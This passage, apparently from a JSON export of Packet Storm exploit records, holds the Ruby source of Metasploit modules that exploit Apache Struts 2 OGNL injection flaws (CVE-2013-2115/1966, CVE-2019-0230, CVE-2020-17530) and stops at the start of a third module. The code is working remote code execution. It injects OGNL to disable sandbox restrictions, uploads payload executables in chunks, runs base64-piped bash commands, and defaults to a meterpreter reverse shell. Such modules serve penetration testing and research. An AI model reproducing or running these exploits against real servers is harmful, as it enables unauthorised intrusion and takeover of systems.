Rodrigues', # Vulnerability Discovery \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-2115'], \n[ 'CVE', '2013-1966'], \n[ 'OSVDB', '93645'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'], \n[ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'May 24 2013', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), \nOptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]), \nOptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject_string = @inject.gsub(/CMD/,cmd) \nuri = normalize_uri(target_uri.path) \nreq_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] } \ncase datastore['HTTPMETHOD'] \nwhen 'POST' \nreq_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }}) \nwhen 'GET' \nreq_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }}) \nend \n \n# Display a nice \"progress bar\" instead of message spam \ncase @notify_flag \nwhen 0 \nprint_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\") \n@notify_flag = 1 \nwhen 1 \nprint(\".\") # Progress dots \nwhen 2 \nprint_status(\"Payload upload complete\") \nend \n \nreturn send_request_cgi(req_hash) #Used for check function. \nend \n \ndef exploit \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \n@java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\" \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = false \n#Now arch specific... \ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \nprint_status(\"Preparing payload...\") \n# Now with all the arch specific stuff set, perform the upload. \n# Need to calculate amount to allocate for non-dynamic parts of the URL. \n# Fixed strings are tokens used for substitutions. \nappend_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue \nsub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length ) \nsub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length \ncase datastore['HTTPMETHOD'] \nwhen 'GET' \nchunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items. \n#This lets us know the length remaining for our base64'd payloads \nchunk_length = ((chunk_length/4).floor)*3 \nwhen 'POST' \nchunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore. \nend \n@notify_flag = 0 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nprint_line() # new line character, after progress bar. \n@notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file. \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = false) \ncmd = @java_upload_part_cmd.gsub(/FILENAME/,filename) \nappend = append ? \"true\" : \"false\" # converted for the string replacement. \ncmd = cmd.gsub!(/APPEND/,append) \ncmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part)) \nexecute_command(cmd) \nend \n \ndef check \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \nprint_status(\"Performing Check...\") \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? \nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121847/struts_include_params.rb.txt"}, {"lastseen": "2020-12-24T21:49:19", "description": "", "cvss3": {}, "published": "2020-12-24T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Forced Multi OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-24T00:00:00", "id": "PACKETSTORM:160721", "href": "https://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation', \n'Description' => %q{ \nThe Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags \nattributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a \ntag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). \n \nThis vulnerability is application dependant. A server side template must make an affected use of request data to \nrender an HTML tag attribute. \n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Matthias Kaiser', # discovery of CVE-2019-0230 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530 \n'ka1n4t', # PoC of CVE-2020-17530 \n], \n'References' => [ \n['CVE', '2019-0230'], \n['CVE', '2020-17530'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'], \n['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'], \n['URL', 'https://github.com/ka1n4t/CVE-2020-17530'], \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), \nOptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']), \nOptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']]) \n]) \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \nOptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request']) \n]) \nend \n \ndef check \nnum1 = rand(1000..9999) \nnum2 = rand(1000..9999) \n \nres = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\")) \nif res.nil? \nreturn CheckCode::Unknown \nelsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty? \nreturn CheckCode::Safe \nend \n \nreturn CheckCode::Appears \nend \n \ndef exploit \ncve = datastore['CVE'] \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\") \n \nif cve == 'CVE-2019-0230' \nognl = [] \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']' \nognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)' \nognl << '#ognlUtil.setExcludedClasses(\\'\\')' \nognl << '#ognlUtil.setExcludedPackageNames(\\'\\')' \nres = send_request_cgi(build_http_request(cve, ognl)) \nfail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200 \nend \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded, { cve: cve }) \nwhen :linux_dropper \nexecute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 }) \nend \nend \n \ndef execute_command(cmd, opts = {}) \nsend_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5) \nend \n \ndef build_http_request(cve, ognl) \nognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array \n \nhttp_request_parameters = { 'uri' => normalize_uri(target_uri.path) } \nhttp_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank? \nif cve == 'CVE-2019-0230' \nhttp_request_parameters['method'] = 'GET' \nhttp_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nelsif cve == 'CVE-2020-17530' \nhttp_request_parameters['method'] = 'POST' \nhttp_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nend \nhttp_request_parameters \nend \n \ndef build_ognl(cve, cmd) \ncmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\" \nognl = [] \nif cve == 'CVE-2019-0230' \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)' \nognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\" \nelsif cve == 'CVE-2020-17530' \nognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]' \nognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]' \nognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")' \nognl << '#bean.setBean(#stack)' \nognl << '#context=#bean.get(\"context\")' \nognl << '#bean.setBean(#context)' \nognl << '#macc=#bean.get(\"memberAccess\")' \nognl << '#bean.setBean(#macc)' \nognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")' \nognl << '#bean.put(\"excludedClasses\",#emptyset)' \nognl << '#bean.put(\"excludedPackageNames\",#emptyset)' \nognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")' \nognl << \"#execute.exec({\\\"#{cmd}\\\"})\" \nend \n \nognl \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160721/struts2_multi_eval_ognl.rb.txt"}, {"lastseen": "2016-12-05T22:16:32", "description": "", "cvss3": {}, "published": "2014-05-02T00:00:00", "type": "packetstorm", "title": "Apache Struts ClassLoader Manipulation Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-05-02T00:00:00", "id": "PACKETSTORM:126445", "href": "https://packetstormsecurity.com/files/126445/Apache-Struts-ClassLoader-Manipulation-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ManualRanking # It's going to manipulate the Class Loader \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows \naccess to 'class' parameter which is directly mapped to getClass() method and \nallows ClassLoader manipulation, which allows remote attackers to execute arbitrary \nJava code via crafted parameters. \n}, \n'Author' => \n[ \n'Mark Thomas', # Vulnerability Discovery \n'Przemyslaw Celej', # Vulnerability Discovery \n'pwntester <alvaro[at]pwntester.com>', # PoC \n'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2014-0094'], \n['CVE', '2014-0112'], \n['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'